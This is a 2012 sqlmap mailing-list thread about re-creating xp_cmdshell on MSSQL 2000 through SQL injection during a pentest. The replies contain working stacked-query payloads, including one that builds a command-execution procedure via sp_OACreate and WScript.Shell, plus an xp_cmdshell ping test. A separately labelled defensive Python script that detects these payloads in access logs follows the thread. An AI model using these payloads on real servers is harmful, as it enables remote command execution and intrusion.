Re: [sqlmap-users] re-create xp_cmdshell
From: Johnny V. <Joh...@zo...> - 2012-06-18 13:05:08
If you want to verify using network connectivity commands like ping, make sure you have access to a public IP and set Wireshark on that box and listen for an ICMP connection from your target.

On Jun 18, 2012, at 6:59 AM, Adi Mutu wrote:

> No problem.
>
> Thanks, that worked, executed without error, however I still can't execute code.
> I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';--
> but nothing, no delay.
>
> From: Miroslav Stampar <mir...@gm...>
> To: Adi Mutu <adi...@ya...>
> Cc: "sql...@li..." <sql...@li...>
> Sent: Monday, June 18, 2012 1:38 PM
> Subject: Re: [sqlmap-users] re-create xp_cmdshell
>
> My bad.
>
> I thought that the problem was trivial :)
>
> This is the right way to do it:
> http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;--
> (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py)
>
> That way you are bypassing that "syntax" obstacle by using the stored procedure master..sp_executesql to do it for you.
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Adi.
>
> This means that CREATE PROCEDURE has to be used right after the semicolon (;) sign.
>
> So, if you have a SELECT SQLi case like:
> SELECT * FROM users WHERE id=$_GET['id']
>
> you would need to inject into it something like:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE..
>
> As you are probably using the "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a....
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote:
> Hello,
>
> I have an MSSQL 2000 SQL injection in a pentest; I try to recreate xp_cmdshell and I get this:
>
> 'CREATE PROCEDURE' must be the first statement in a query batch.
>
> Does anybody have any idea about this behaviour and whether something can be done about it?
>
> Thanks
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
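From the defender's side, the following added example (not sqlmap code and not from anyone in the thread) scans constructed web-server access-log lines for the stacked-query pattern Miroslav describes: a `;` that closes the intended statement, followed by CREATE PROCEDURE, sp_executesql or the sp_OA* procedures used to rebuild xp_cmdshell. The log format, parameter names and hosts are assumptions.

```python
"""Heuristic detector for the stacked-query pattern discussed in the
thread: a ';' closing the intended statement, followed by CREATE
PROCEDURE, sp_executesql or the OLE automation procedures used to
rebuild xp_cmdshell. Added example, not sqlmap code; the log lines
below are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Keywords that only belong after a statement separator inside a
# single parameter value; matched case-insensitively after decoding.
STACKED_KEYWORDS = re.compile(
    r";\s*(?:declare\s+@|create\s+procedure|exec(?:ute)?\s+(?:master\.\.)?"
    r"(?:sp_executesql|sp_oacreate|sp_oamethod|xp_cmdshell))",
    re.IGNORECASE,
)

def suspicious_params(url):
    """Return (name, decoded value) pairs whose value carries stacked T-SQL."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        # Decode twice so %0a-style and double-encoded payloads both surface.
        decoded = unquote_plus(unquote_plus(value))
        if STACKED_KEYWORDS.search(decoded):
            hits.append((name, decoded))
    return hits

def scan_access_log(lines):
    """Yield (line_no, param, decoded value) for each matching request."""
    request = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
    for n, line in enumerate(lines, 1):
        m = request.search(line)
        if not m:
            continue
        # Prepend a dummy scheme/host so urlsplit parses the request path.
        for name, value in suspicious_params("http://x" + m.group(1)):
            yield n, name, value

# Constructed sample log lines (not from the thread or any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2012:13:05:08 +0000] "GET /vuln.asp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Jun/2012:13:05:09 +0000] "GET /vuln.asp?id=1;DECLARE%20@abc%20nvarchar(999);%20SET%20@abc=%27...%27;%20EXEC%20master..sp_executesql%20@abc;-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [18/Jun/2012:13:05:10 +0000] "GET /vuln.asp?id=1;exec%20xp_cmdshell%20%27ping%20-n%2030%20example.com%27;-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [18/Jun/2012:13:05:11 +0000] "GET /search.asp?q=create%20procedure%20docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, param, value in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} -> {value}")
```

The last sample line shows why the regex insists on a preceding `;`: the words "create procedure" in an ordinary search term are not flagged on their own.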